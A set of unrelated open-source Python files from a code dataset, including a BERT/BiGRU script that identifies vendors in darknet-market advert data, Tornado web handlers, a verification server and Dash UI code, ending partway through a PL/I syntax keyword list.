classify\")\nparser.add_argument('--version', type=str, default='full', help='Run on small data or full data. 
Can be (\"small\" or \"full\").')\nparser.add_argument('--setting', type=str, default='low', help=\"Low for low-resource setting and High for high-resource setting\")\nparser.add_argument('--n_splits', type=int, default=5, help='Number of trials to perform cross validation')\nparser.add_argument('--split_ratio', type=float, default=0.25, help=\"Splitting ratio for the dataset\")\nparser.add_argument('--preprocess_flag', action='store_true', help='Preprocess data')\nparser.add_argument('--ads_count', type=int, default=20, help=\"Minimum number of advertisements per vendor\")\nargs = parser.parse_args()\n\n\nlogging.basicConfig(level=logging.ERROR)\n# Creating a directory if the path doesn't exist\nPath(os.path.join(args.save_model_dir, args.pretrained_model)).mkdir(parents=True, exist_ok=True)\n\n# setting random seed\nrandom.seed(args.seed)\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\ntorch.cuda.manual_seed_all(args.seed)\n# Ensure that all operations are deterministic on GPU (if used) for reproducibility\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n# %% Loading the datasets\nalpha_df = pd.read_csv(os.path.join(args.data_dir, \"preprocessed_alpha.csv\"), error_bad_lines=False, \n                    lineterminator='\\n', usecols=['marketplace', 'title', 'vendor', 'prediction', 'ships_to', 'ships_from', 'description']).drop_duplicates()\ndreams_df = pd.read_csv(os.path.join(args.data_dir, \"preprocessed_dreams.csv\"), error_bad_lines=False, \n                    lineterminator='\\n', usecols=['marketplace', 'title', 'vendor', 'prediction', 'ships_to', 'ships_from', 'description']).drop_duplicates()\nsilk_df = pd.read_csv(os.path.join(args.data_dir, \"preprocessed_silk.csv\"), error_bad_lines=False, \n                    lineterminator='\\n', usecols=['marketplace', 'title', 'vendor', 'prediction', 'ships_to', 'ships_from', 'description']).drop_duplicates()\nagora_df = pd.read_csv(os.path.join(args.data_dir, \"preprocessed_agora.csv\"), error_bad_lines=False, encoding = \"ISO-8859-1\")\nagora_df = agora_df[['Vendor', ' Item', ' Item Description']]\nagora_df.columns = ['vendor', 'title', 'description']\nagora_df['vendor'] = agora_df['vendor'].apply(lambda x : str(x).lower())\n\ndata_df = {\"alpha\":alpha_df, \"dreams\":dreams_df, \"silk\":silk_df, \"agora\":agora_df}\n\n[(train_alpha_dreams, train_dreams_silk, train_alpha_silk, train_alpha_dreams_silk, train_alpha, train_dreams, train_silk), (test_alpha_dreams, test_dreams_silk, test_alpha_silk, test_alpha_dreams_silk, test_alpha, test_dreams, test_silk)] = FetchData(data_df, args.version, args.data_to_load_pretrain_model, args.split_ratio, args.preprocess_flag, args.setting, args.ads_count, args.seed).split_data()\n[(train_valhalla_traderoute, train_traderoute_berlusconi, train_valhalla_berlusconi, train_traderoute_agora, train_valhalla_traderoute_berlusconi, train_valhalla, train_traderoute, train_berlusconi, train_agora), (test_valhalla_traderoute, test_traderoute_berlusconi, test_valhalla_berlusconi, test_traderoute_agora, test_valhalla_traderoute_berlusconi, test_valhalla, test_traderoute, test_berlusconi, test_agora)] = FetchData(data_df, args.version, args.data_to_train, args.split_ratio, args.preprocess_flag, \"low\", args.ads_count, args.seed).split_data()\n\n# %% Loading pre-trained model\ndata = pd.concat([train_dreams, test_dreams, train_alpha, test_alpha, train_silk, test_silk])\nall_vendors = list(data['vendor'].unique())\nvendor_to_idx_dict = 
{vendor_name:index for index, vendor_name in enumerate(all_vendors)}\n\n# Initialize the BERT tokenizer and model\ntokenizer = BertTokenizer.from_pretrained('bert-base-cased', truncation=True, do_lower_case=True)\nbert_model = BertForSequenceClassification.from_pretrained(\"bert-base-cased\",\n num_labels=len(vendor_to_idx_dict),\n output_attentions=False,\n output_hidden_states=True).to(device)\n\n# load model\nbert_model.load_state_dict(torch.load(args.load_model))\nbert_model.eval()\nbert_model.zero_grad()\n\nif args.data_to_train == \"traderoute-agora\":\n data_df = pd.concat([train_traderoute, test_traderoute, train_agora, test_agora])\n all_vendors = list(data_df['vendor'].unique())\n vendor_to_idx_dict = {vendor_name:index for index, vendor_name in enumerate(all_vendors)}\n \n train_traderoute['vendor'] = train_traderoute['vendor'].replace(vendor_to_idx_dict, regex=True)\n test_traderoute['vendor'] = test_traderoute['vendor'].replace(vendor_to_idx_dict, regex=True)\n train_agora['vendor'] = train_agora['vendor'].replace(vendor_to_idx_dict, regex=True)\n test_agora['vendor'] = test_agora['vendor'].replace(vendor_to_idx_dict, regex=True)\n\n train_traderoute = merge_and_create_dataframe(train_traderoute)\n test_traderoute = merge_and_create_dataframe(test_traderoute)\n train_agora = merge_and_create_dataframe(train_agora)\n test_agora = merge_and_create_dataframe(test_agora)\n\n # merging the training and test data\n train_df = pd.concat([train_traderoute, train_agora]).drop_duplicates()\n test_df = pd.concat([test_traderoute, test_agora]).drop_duplicates()\n\nelif args.data_to_train == \"valhalla-berlusconi\":\n data_df = pd.concat([train_valhalla, test_valhalla, train_berlusconi, test_berlusconi])\n all_vendors = list(data_df['vendor'].unique())\n vendor_to_idx_dict = {vendor_name:index for index, vendor_name in enumerate(all_vendors)}\n\n train_valhalla['vendor'] = train_valhalla['vendor'].replace(vendor_to_idx_dict, regex=True)\n test_valhalla['vendor'] = test_valhalla['vendor'].replace(vendor_to_idx_dict, regex=True)\n train_berlusconi['vendor'] = train_berlusconi['vendor'].replace(vendor_to_idx_dict, regex=True)\n test_berlusconi['vendor'] = test_berlusconi['vendor'].replace(vendor_to_idx_dict, regex=True)\n\n train_valhalla = merge_and_create_dataframe(train_valhalla)\n test_valhalla = merge_and_create_dataframe(test_valhalla)\n train_berlusconi = merge_and_create_dataframe(train_berlusconi)\n test_berlusconi = merge_and_create_dataframe(test_berlusconi)\n\n # merging the training and test data\n train_df = pd.concat([train_valhalla, train_berlusconi]).drop_duplicates()\n test_df = pd.concat([test_valhalla, test_berlusconi]).drop_duplicates()\n \nelse:\n raise Exception(\"data_to_train can only be either valhalla-berlusconi or traderoute-agora\")\n\n# Splitting the data into train and validation dataset\ntrain_df, val_df = train_test_split(train_df, test_size=0.05, random_state=args.seed, shuffle=True)\n\n# Initializing the GRU model for Bert Embeddings\ngru_model = BiGRUBertClassifier(vocab_size=len(tokenizer.get_vocab()), embedding_size=args.embedding_len, hidden_units=args.hidden_units, \n max_seq_len=args.max_seq_len, batch_size=args.batch_size, n_layers=args.n_layers, \n output_size=len(all_vendors))\n\nnum_of_parameters = sum(map(torch.numel, gru_model.parameters()))\nprint(\"Number of parameters:\", num_of_parameters)\n\n# Encoding the train data through the transformer tokenizer\nencoded_data = tokenizer.batch_encode_plus(train_df.text.values, \n 
add_special_tokens=True, \n return_attention_mask=True, \n pad_to_max_length=True, \n max_length=args.max_seq_len, \n return_tensors='pt')\ninput_ids = encoded_data['input_ids']\nattention_masks = encoded_data['attention_mask']\nlabels_ = torch.tensor(train_df.labels.values)\ndataset = TensorDataset(input_ids, attention_masks, labels_)\n\n# Data Loaders\ntrain_dataloader = DataLoader(dataset, sampler=RandomSampler(dataset), batch_size=args.batch_size)\n# Encoding the val data through the transformer tokenizer\nencoded_data = tokenizer.batch_encode_plus(val_df.text.values, \n add_special_tokens=True, \n return_attention_mask=True, \n pad_to_max_length=True, \n max_length=args.max_seq_len, \n return_tensors='pt')\ninput_ids = encoded_data['input_ids']\nattention_masks = encoded_data['attention_mask']\nlabels_ = torch.tensor(val_df.labels.values)\ndataset = TensorDataset(input_ids, attention_masks, labels_)\n# Data Loaders\nvalid_dataloader = DataLoader(dataset, sampler=RandomSampler(dataset), batch_size=args.batch_size)\n# valid_weights = extract_layer_representations_from_bert_last_layer(bert_model, valid_dataloader, attention_masks, vendor_to_idx_dict, device)\n\n# Encoding the test data through the transformer tokenizer\nencoded_data = tokenizer.batch_encode_plus(test_df.text.values, \n add_special_tokens=True, \n return_attention_mask=True, \n pad_to_max_length=True, \n max_length=512, \n return_tensors='pt')\ninput_ids = encoded_data['input_ids']\nattention_masks = encoded_data['attention_mask']\nlabels_ = torch.tensor(test_df.labels.values)\ndataset = TensorDataset(input_ids, attention_masks, labels_)\n# Data Loaders\ntest_dataloader = DataLoader(dataset, sampler=RandomSampler(dataset), batch_size=args.batch_size)\n# test_weights = extract_layer_representations_from_bert_last_layer(bert_model, test_dataloader, attention_masks, vendor_to_idx_dict, device)\n\n# %% Training and evaluating the model\n\n# Initializing the optimizer\noptimizer = torch.optim.Adam(gru_model.parameters(), lr=args.lr)\n\n# Training the model\nstart_time = time.time()\ntrainGRUBERT(model=gru_model, pretrained_model=bert_model, layer=args.bert_layer, optimizer=optimizer, criterion = nn.CrossEntropyLoss(), train_loader = train_dataloader,\n valid_loader = valid_dataloader, num_epochs = args.nb_epochs, max_seq_len = args.max_seq_len,\n batch_size = args.batch_size, eval_every = len(train_dataloader) // 2, file_path = args.save_model_dir, device=device)\nend_time = time.time()\nprint(\"Total time taken :\", end_time - start_time)\n\n# Evaluating the model on test data\nprint(\"Evaluation on Test data:\")\n# evaluate_GRU_BERT_model(model=gru_model, valid_loader=test_dataloader, valid_text_embeddings=test_weights, batch_size=args.batch_size, device=device)\nevaluateGRUBERT(model=gru_model, pretrained_model=bert_model, layer=args.bert_layer, valid_loader=test_dataloader, batch_size=args.batch_size, device=device)\n","repo_name":"maastrichtlawtech/VendorLink","sub_path":"vendor-verification/transfer_BiGRU.py","file_name":"transfer_BiGRU.py","file_ext":"py","file_size_in_byte":14850,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"19"} +{"seq_id":"34383322113","text":"from collections import OrderedDict\nfrom duckietown_utils import indent\nfrom duckietown_utils.fuzzy import Spec\n\n\nclass MakeTimeSlice(Spec):\n def __init__(self, spec, t0, t1):\n Spec.__init__(self, [spec])\n self.t0 = t0\n self.t1 = t1\n \n def __str__(self):\n s = 'MakeTimeSlice { %s : %s }' % (self.t0, 
self.t1)\n        s += '\\n' + indent(str(self.children[0]), '  ')\n        return s\n    \n    def match(self, x):\n        raise NotImplementedError()\n    \n    def match_dict(self, seq):\n        results = self.children[0].match_dict(seq)\n        matches = OrderedDict()\n        for k, v in results.items():\n            matches[k] = self.transform(v) \n        return matches\n    \n    def transform(self, log):\n        if not log.valid:\n            return log\n        u0 = log.t0\n        u1 = log.t1\n        assert (u0 is not None) and (u1 is not None), log\n        assert u0 <= u1\n        if self.t0 is not None:\n            new_start = u0 + self.t0\n        else:\n            new_start = u0\n        if self.t1 is not None:\n            new_end = u0 + self.t1\n        else:\n            new_end = u1\n        length = new_end - new_start\n        return log._replace(t0=new_start, t1=new_end, length=length)\n    \ndef slice_time(m, spec):\n    if m.group('t0') is not None:\n        t0 = float(m.group('t0'))\n    else:\n        t0 = None\n    \n    if m.group('t1') is not None:\n        t1 = float(m.group('t1'))\n    else:\n        t1 = None\n    return MakeTimeSlice(spec, t0, t1)\n\n# float = \"[-+]?[0-9]*\\\\.?[0-9]+\"\nfilters_slice = {\n    r'{(?P<t0>[-+]?[0-9]*\\\\.?[0-9]+)?:(?P<t1>[-+]?[0-9]*\\\\.?[0-9]+)?}': slice_time,\n}\n","repo_name":"spadma3/duck","sub_path":"catkin_ws/src/00-infrastructure/easy_logs/include/easy_logs/time_slice.py","file_name":"time_slice.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} {"seq_id":"16624458600","text":"#!/usr/bin/env python\n# encoding: utf-8\nfrom tornado import gen\nfrom api.base_handler import BaseHandler\nimport tornado\nfrom common.tools import args404, ObjectToString\nimport re\nimport json\nfrom configs.web_config import Test_Secret_Key, Live_Secret_Key, pingpp_app_key, pingpp_api_key\n\n\n# Q&A home page\nclass WorkplaceHomeHandler(BaseHandler):\n    @gen.coroutine\n    @tornado.web.asynchronous\n    def get(self, page, num, token):\n        self.log.info('+++++++++++Q&A home page Full+++++++++++')\n        cache_flag = self.get_cache_flag()\n        result = yield self.db.workplace_home(page, num, token, cache_flag)\n\n        self.write(ObjectToString().encode(result))\n        self.finish()\n        return\n\n\n# Q&A home page carousel\nclass WorkplaceHomeSlideHandler(BaseHandler):\n    @gen.coroutine\n    @tornado.web.asynchronous\n    def get(self):\n        self.log.info('+++++++++++Q&A home page carousel Full+++++++++++')\n        cache_flag = self.get_cache_flag()\n        result = yield self.db.workplace_home_slide(cache_flag)\n\n        self.write(ObjectToString().encode(result))\n        self.finish()\n        return\n\n\n# Topic list\nclass TopicListHandler(BaseHandler):\n    @gen.coroutine\n    @tornado.web.asynchronous\n    def post(self):\n        self.log.info('+++++++++++Topic list Full+++++++++++')\n        self.log.info(self.get_arguments())\n        cache_flag = self.get_cache_flag()\n        page = self.get_argument('page')\n        num = self.get_argument('num')\n        field = self.get_argument('field')\n        token = self.get_argument('token')\n\n        result = yield self.db.topic_list(page, num, field, token, cache_flag)\n\n        self.write(ObjectToString().encode(result))\n        self.finish()\n        return\n\n\n# Expert detail page\nclass ExpertFullHandler(BaseHandler):\n    @gen.coroutine\n    @tornado.web.asynchronous\n    def get(self, expert, token):\n        self.log.info('+++++++++++Expert detail page Full+++++++++++')\n        cache_flag = self.get_cache_flag()\n        result = yield self.db.expert_full(expert, token, cache_flag)\n\n        self.write(ObjectToString().encode(result))\n        self.finish()\n        return\n\n\n# Topic detail page\nclass TopicFullHandler(BaseHandler):\n    @gen.coroutine\n    @tornado.web.asynchronous\n    def get(self, topic, token):\n        self.log.info('+++++++++++ Topic detail page TopicFull +++++++++++')\n        cache_flag = self.get_cache_flag()\n        result = yield self.db.topic_full(topic, 
token, cache_flag)\n\n        self.write(ObjectToString().encode(result))\n        self.finish()\n        return\n\n\n# Review list and detail page\nclass EvaluateGetHandler(BaseHandler):\n    @gen.coroutine\n    @tornado.web.asynchronous\n    def get(self, page, num, expert, token):\n        self.log.info('+++++++++++ Review list and detail page Evaluate +++++++++++')\n        cache_flag = self.get_cache_flag()\n        result = yield self.db.evaluate_get(page, num, expert, token, cache_flag)\n\n        self.write(ObjectToString().encode(result))\n        self.finish()\n        return\n\n\n# Write review page\nclass EvaluateEditHandler(BaseHandler):\n    @gen.coroutine\n    @tornado.web.asynchronous\n    def get(self):\n        self.log.info('+++++++++++ Write review page Evaluate Edit get +++++++++++')\n        cache_flag = self.get_cache_flag()\n        token = self.get_argument('token')\n        reservation_id = self.get_argument('reservation_id')\n        result = yield self.db.evaluate_edit_get(reservation_id, token, cache_flag)\n\n        self.write(ObjectToString().encode(result))\n        self.finish()\n        return\n\n    @gen.coroutine\n    @tornado.web.asynchronous\n    def post(self):\n        self.log.info('+++++++++++ Write review page Evaluate Edit post +++++++++++')\n        self.log.info(self.get_arguments())\n        cache_flag = self.get_cache_flag()\n        token = self.get_argument('token')\n        reservation_id = self.get_argument('reservation_id', '')\n        score = self.get_argument('score')\n        evaluate = self.get_argument('evaluate')\n        result = yield self.db.evaluate_edit_post(reservation_id, score, evaluate, token, cache_flag)\n\n        self.write(ObjectToString().encode(result))\n        self.finish()\n        return\n\n\n# Reservation page\nclass ReservationHandler(BaseHandler):\n    # @gen.coroutine\n    # @tornado.web.asynchronous\n    # def get(self): # no longer used\n    #     self.log.info('+++++++++++ Reservation GET +++++++++++')\n    #     self.log.info(self.get_arguments())\n    #     cache_flag = self.get_cache_flag()\n    #     token = self.get_argument('token')\n    #     topic_id = self.get_argument('topic_id')\n    #     # expert_id = self.get_argument('expert_id')\n    #     result = yield self.db.reservation_get(topic_id, token, cache_flag)\n    #\n    #     self.write(ObjectToString().encode(result))\n    #     self.finish()\n    #     return\n\n    @gen.coroutine\n    @tornado.web.asynchronous\n    def post(self):\n        self.log.info('+++++++++++ Reservation POST start +++++++++++')\n        self.log.info(self.get_arguments())\n        cache_flag = self.get_cache_flag()\n        token = self.get_argument('token')\n        meet_message = self.get_argument('meet_message')\n        meet_question = self.get_argument('meet_question')\n        topic_id = self.get_argument('topic_id')\n        expert_id = self.get_argument('expert_id')\n        result = yield self.db.reservation(topic_id, expert_id, meet_message, meet_question, token, cache_flag)\n\n        self.write(ObjectToString().encode(result))\n        self.finish()\n        return\n\n\n# Payment page\nclass WorkplacePayHandler(BaseHandler):\n    @gen.coroutine\n    @tornado.web.asynchronous\n    def post(self):\n        self.log.info('+++++++++++ Payment page 200 +++++++++++')\n        self.log.info(self.get_arguments())\n        cache_flag = self.get_cache_flag()\n\n        pingxx_secret_key = pingpp_api_key['test_test']\n        ip = self.request.remote_ip\n        token = self.get_argument('token')\n        pay_type = self.get_argument('pay_type')\n        # money = self.get_argument('money')\n        topic_id = self.get_argument('topic_id')\n        if re.match(r'\\d+', '%s' % token):\n            result = yield self.db.workplace_pay(pingpp_app_key, pingxx_secret_key, topic_id,\n                                                 pay_type, ip, token, cache_flag)\n        else:\n            result = dict()\n            result['status'] = 'fail'\n            result['token'] = token\n            result['msg'] = 'Not logged in'\n            result['data'] = {}\n        self.write(ObjectToString().encode(result))\n        self.finish()\n        return\n\n\n# Payment success page\nclass 
WorkplacePaySuccessHandler(BaseHandler):\n    @gen.coroutine\n    @tornado.web.asynchronous\n    def get(self, message_id, token):\n        self.log.info('+++++++++++ Payment success page 200 +++++++++++')\n        cache_flag = self.get_cache_flag()\n        result = yield self.db.workplace_pay_success(message_id, token, cache_flag)\n\n        self.write(ObjectToString().encode(result))\n        self.finish()\n        return\n\n\n# Payment callback result returned by Ping++\nclass WorkplacePayResultHandler(BaseHandler):\n    @gen.coroutine\n    @tornado.web.asynchronous\n    def post(self):\n        self.log.info(\"--------------------------------- ping ++ receive charge result....\")\n        self.log.info(self.request.body)\n        form = json.loads(self.request.body)\n        self.log.info(json.dumps(form, indent=4))\n        cache_flag = self.get_cache_flag()\n        result = yield self.db.recv_charge(charge=form, cache_flag=cache_flag)\n        self.log.info('charge is saved OK')\n        self.write('success')\n        self.finish()\n        return\n\n        # # test charge\n        # from test.test_action import test_charge\n        # form = test_charge.form # test order\n        # cache_flag = self.get_cache_flag()\n        # result = yield self.db.recv_charge(charge=form, cache_flag=cache_flag)\n        # self.log.info('test charge is saved OK')\n        # self.write('test success')\n        # self.finish()\n        # return\n","repo_name":"screensme/take_job_demo","sub_path":"api/workplaceQA_handler.py","file_name":"workplaceQA_handler.py","file_ext":"py","file_size_in_byte":8009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} {"seq_id":"6122792748","text":"import numpy as np\nimport charm4py\nfrom charm4py import charm, Chare, coro, Reducer, Group, Future, Array, Channel\nimport TLLnetIO as TLLnet\nimport posetFastCharm\nimport TLLHypercubeReach\n\nimport time\nimport pickle\n\n# Server code from https://gist.github.com/mdonkers/63e115cc0c79b4f6b8b3a6b797e485c7\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport logging\nimport json\n\nclass ShutdownServer(Exception):\n    pass\n\ncharm.options.local_msg_buf_size = 10000\n# Disable profiling\ncharm.options.profiling = False\n\nclass Server(Chare):\n    def __init__(self,processorRemote):\n\n        toProcessorsChannel = Channel(self,processorRemote)\n        fromProcessorsChannel = Channel(self,processorRemote)\n\n        workingBase = [False]\n        problem_setBase = [False]\n\n        self.toProcessorsChannel = toProcessorsChannel\n        self.fromProcessorsChannel = fromProcessorsChannel\n\n        self.working = workingBase\n        self.problem_set = problem_setBase\n\n        class S(BaseHTTPRequestHandler):\n            toProcChan = toProcessorsChannel\n            fromProcChan = fromProcessorsChannel\n\n            working = workingBase\n            problem_set = problem_setBase\n\n            def _set_response(self,content=None):\n                self.send_response(200)\n                self.send_header('Content-type', 'text/html')\n                self.end_headers()\n                if content is not None:\n                    self.wfile.write(content)\n                # self.wfile.close()\n\n            def do_GET(self):\n\n                if not self.working[0] or not self.problem_set[0]:\n                    logging.info(\"GET request,\\nPath: %s\\nHeaders:\\n%s\\n\", str(self.path), str(self.headers))\n                    self._set_response()\n                    self.wfile.write(\"GET request for {}\".format(self.path).encode('utf-8'))\n                else:\n                    result = self.fromProcChan.recv()\n                    dataContent = bytes(json.dumps(result,separators=(',', ':')), encoding='utf8')\n                    print(f'Sending {dataContent}')\n                    self._set_response(content=dataContent)\n                    self.working[0] = False\n                    self.problem_set[0] = False\n\n            def do_POST(self):\n                content_length = int(self.headers['Content-Length']) # <--- Gets the size of data\n                post_data = self.rfile.read(content_length) # <--- Gets the data itself\n                data 
= json.loads(post_data.decode('utf-8'))\n logging.info(\"POST request,\\nPath: %s\\nHeaders:\\n%s\\n\\nBody:\\n%s\\n\",\n str(self.path), str(self.headers), data)\n\n self._set_response()\n self.wfile.write(\"POST request for {}\".format(self.path).encode('utf-8'))\n if 'COMMAND' in data:\n if data['COMMAND'] == 'NEW_PROBLEM':\n if not self.working[0]:\n self.toProcChan.send(data)\n self.problem_set[0] = True\n else:\n print('ERROR: recieved new problem before finishing with the last one')\n elif data['COMMAND'] == 'GO':\n print([self.problem_set[0],self.working[0]])\n if self.problem_set[0] and not self.working[0]:\n self.toProcChan.send(data)\n self.working[0] = True\n else:\n print('ERROR: no problem has been set yet')\n\n elif data['COMMAND'] == 'SHUTDOWN':\n self.toProcChan.send(data)\n raise KeyboardInterrupt()\n self.handler_class = S\n @coro\n def run(self,server_class=HTTPServer, port=8080):\n logging.basicConfig(level=logging.INFO)\n server_address = ('', port)\n httpd = server_class(server_address, self.handler_class)\n logging.info('Starting httpd...\\n')\n try:\n httpd.serve_forever()\n except KeyboardInterrupt:\n pass\n httpd.server_close()\n logging.info('Stopping httpd...\\n')\n\ndef localLinToNumpy(localLinearFns):\n return [\n [ np.array(x,dtype=np.float64) for x in output ] for output in localLinearFns\n ]\n\ndef selectorsToSet(selectorSets):\n return [\n [ set(x) for x in output ] for output in selectorSets\n ]\n\nclass FastBATLLNNServer(Chare):\n\n def __init__(self,args):\n\n # Instantiate HTTP server\n serverTask = Chare(Server, args=[self.thisProxy], onPE=charm.numPes()-1)\n charm.awaitCreation(serverTask)\n # Create channels to/from HTTP server PE\n fromServerChannel = Channel(self,serverTask)\n toServerChannel = Channel(self,serverTask)\n\n # Instantiate FastBATLLNN\n pes = {'poset':[(0,charm.numPes()-1,1)],'hash':[(0,charm.numPes()-1,1)]}\n useQuery = False\n useBounding = False\n tllReach = Chare(TLLHypercubeReach.TLLHypercubeReach, args=[pes])\n charm.awaitCreation(tllReach)\n\n # Start listening for HTTP connnections\n serverDone = serverTask.run(awaitable=True)\n\n # Get the first command via HTTP\n msg = fromServerChannel.recv()\n\n timeout=300\n\n while msg and type(msg) is dict:\n\n if not 'COMMAND' in msg:\n # ignore this message, and get the next\n msg = fromServerChannel.recv()\n continue\n\n if msg['COMMAND'] == 'SHUTDOWN':\n toServerChannel.send({})\n break\n\n if msg['COMMAND'] == 'NEW_PROBLEM':\n\n validProc = True\n problemID = 'NULL'\n for k in ['A_in','b_in','A_out','b_out','n','N','M','m','localLinearFns','selectorSets','TLLFormatVersion','id']:\n if not k in msg:\n validProc = False\n\n # We got a valid new problem (more or less), so set things up to run FastBATLLNN\n if validProc:\n msg['localLinearFns'] = localLinToNumpy(msg['localLinearFns'])\n msg['selectorSets'] = selectorsToSet(msg['selectorSets'])\n for k in ['A_in', 'b_in']:\n msg[k] = np.array(msg[k],dtype=np.float64)\n\n tll = TLLnet.TLLnet.fromTLLFormat(msg)\n constraints = [msg['A_in'] , msg['b_in']]\n problemID = msg['id']\n A_out = msg['A_out']\n b_out = msg['b_out']\n\n\n # Now wait for either a \"GO\" or \"SHUTDOWN\" command\n msg = fromServerChannel.recv()\n while msg:\n if type(msg) is dict and 'COMMAND' in msg:\n if msg['COMMAND'] == 'SHUTDOWN' or msg['COMMAND'] == 'GO':\n break\n else:\n msg = fromServerChannel.recv()\n\n if msg['COMMAND'] == 'SHUTDOWN':\n toServerChannel.send({})\n break\n\n # If we got a GO command for some other problem, then return an invalid result\n if 
not 'id' in msg or msg['id'] != problemID:\n validProc = False\n if 'timeout' in msg:\n timeout = msg['timeout']\n # We recieved a GO command\n if not validProc:\n toServerChannel.send({'id':problemID,'RESULT':'INVALID'})\n else:\n # Here is where we will actually run FastBATLLNN\n tllReach.initialize(tll , constraints, 100, useQuery, awaitable=True).get()\n if A_out > 0:\n result = not bool(tllReach.verifyLB(b_out,timeout=(timeout if timeout > 0 else None),ret=True).get()) # verify NN >= a: True/1 == SAT; False/0 == UNSAT\n else:\n result = bool(tllReach.verifyUB(-b_out,timeout=(timeout if timeout > 0 else None),ret=True).get()) # verify NN <= b: True/1 == UNSAT; False/0 == SAT\n retDict = {'id':problemID,'RESULT':'sat' if result else 'unsat'}\n if result:\n ce = tllReach.getCounterExamplePoint(ret=True).get()\n if type(ce) is list and len(ce) == 2 and ce[0] is not None and ce[1] is not None:\n retDict['counterExample'] = ce[0].flatten().tolist()\n retDict['counterExampleVal'] = ce[1].flatten().tolist()\n toServerChannel.send(retDict)\n\n # Now wait for either a \"GO\" or \"SHUTDOWN\" command\n msg = fromServerChannel.recv()\n\n serverDone.get()\n\n charm.exit()\n\ncharm.start(FastBATLLNNServer,modules=['posetFastCharm','TLLHypercubeReach','DistributedHash'])\n\n","repo_name":"jferlez/FastBATLLNN","sub_path":"FastBATLLNNServer.py","file_name":"FastBATLLNNServer.py","file_ext":"py","file_size_in_byte":8902,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"8010567912","text":"import dash_bootstrap_components as dbc\nfrom dash import html\n\n\ntab_today = dbc.Card(\n [\n html.P(\"Filter set to 'today'\",className=\"card-text\"),\n ],\n)\ntab_daily = dbc.Card(\n [\n html.P(\"Filter set to 'daily'\",className=\"card-text\"),\n ]\n)\ntab_weekly = dbc.Card(\n [\n html.P(\"Filter set to 'weekly'\",className=\"card-text\"),\n ]\n)\ntab_monthly = dbc.Card(\n [\n html.P(\"Filter set to 'monthly'\",className=\"card-text\"),\n ]\n)\ntab_total = dbc.Card(\n [\n html.P(\"Filter set to 'total'\",className=\"card-text\"),\n ]\n)\n\ntabs = dbc.Tabs(\n [\n dbc.Tab(tab_today, label=\"today\", tab_id='tab-today'),\n dbc.Tab(tab_daily, label=\"daily\", tab_id='tab-daily'),\n dbc.Tab(tab_weekly, label=\"weekly\", tab_id='tab-weekly'),\n dbc.Tab(tab_monthly, label=\"monthly\", tab_id='tab-monthly'),\n dbc.Tab(tab_total, label=\"total\", tab_id='tab-total'),\n ],\n id='tabs',\n active_tab=\"tab-today\",\n className=\"nav-fill\"\n)","repo_name":"Anonymous5726221/lapalma_data","sub_path":"app/components/tabs.py","file_name":"tabs.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8155418941","text":"# Leo colorizer control file for pl1 mode.\r\n# This file is in the public domain.\r\n\r\n# Properties for pl1 mode.\r\nproperties = {\r\n \"commentEnd\": \"*/\",\r\n \"commentStart\": \"/*\",\r\n \"wordBreakChars\": \",+-=<>/?^&*\",\r\n}\r\n\r\n# Attributes dict for pl1_main ruleset.\r\npl1_main_attributes_dict = {\r\n \"default\": \"null\",\r\n \"digit_re\": \"\",\r\n \"escape\": \"\\\\\",\r\n \"highlight_digits\": \"false\",\r\n \"ignore_case\": \"true\",\r\n \"no_word_sep\": \"\",\r\n}\r\n\r\n# Dictionary of attributes dictionaries for pl1 mode.\r\nattributesDictDict = {\r\n \"pl1_main\": pl1_main_attributes_dict,\r\n}\r\n\r\n# Keywords dict for pl1_main ruleset.\r\npl1_main_keywords_dict = {\r\n \"%include\": \"keyword1\",\r\n \"a\": \"keyword2\",\r\n 
\"abnormal\": \"keyword2\",\r\n \"abs\": \"keyword3\",\r\n \"acos\": \"keyword3\",\r\n \"acosf\": \"keyword3\",\r\n \"add\": \"keyword3\",\r\n \"addr\": \"keyword3\",\r\n \"addrdata\": \"keyword3\",\r\n \"address\": \"keyword3\",\r\n \"alias\": \"keyword1\",\r\n \"aligned\": \"keyword2\",\r\n \"all\": \"keyword3\",\r\n \"alloc\": \"keyword1\",\r\n \"allocate\": \"keyword1\",\r\n \"allocation\": \"keyword3\",\r\n \"allocn\": \"keyword3\",\r\n \"allocsize\": \"keyword3\",\r\n \"any\": \"keyword3\",\r\n \"anycond\": \"keyword2\",\r\n \"anycondition\": \"keyword2\",\r\n \"area\": \"keyword2\",\r\n \"asgn\": \"keyword2\",\r\n \"asin\": \"keyword3\",\r\n \"asinf\": \"keyword3\",\r\n \"asm\": \"keyword2\",\r\n \"assembler\": \"keyword2\",\r\n \"assignable\": \"keyword2\",\r\n \"atan\": \"keyword3\",\r\n \"atand\": \"keyword3\",\r\n \"atanf\": \"keyword3\",\r\n \"atanh\": \"keyword3\",\r\n \"attach\": \"keyword1\",\r\n \"attention\": \"keyword2\",\r\n \"attn\": \"keyword2\",\r\n \"auto\": \"keyword2\",\r\n \"automatic\": \"keyword2\",\r\n \"availablearea\": \"keyword3\",\r\n \"b\": \"keyword2\",\r\n \"b3\": \"keyword2\",\r\n \"b4\": \"keyword2\",\r\n \"based\": \"keyword2\",\r\n \"begin\": \"keyword1\",\r\n \"bigendian\": \"keyword2\",\r\n \"bin\": \"keyword2\",\r\n \"binary\": \"keyword2\",\r\n \"binaryvalue\": \"keyword3\",\r\n \"bind\": \"keyword3\",\r\n \"binvalue\": \"keyword3\",\r\n \"bit\": \"keyword2\",\r\n \"bitloc\": \"keyword3\",\r\n \"bitlocation\": \"keyword3\",\r\n \"bool\": \"keyword3\",\r\n \"buf\": \"keyword2\",\r\n \"buffered\": \"keyword2\",\r\n \"builtin\": \"keyword2\",\r\n \"bx\": \"keyword2\",\r\n \"by\": \"keyword1\",\r\n \"byaddr\": \"keyword2\",\r\n \"byname\": \"keyword1\",\r\n \"byte\": \"keyword3\",\r\n \"byvalue\": \"keyword2\",\r\n \"c\": 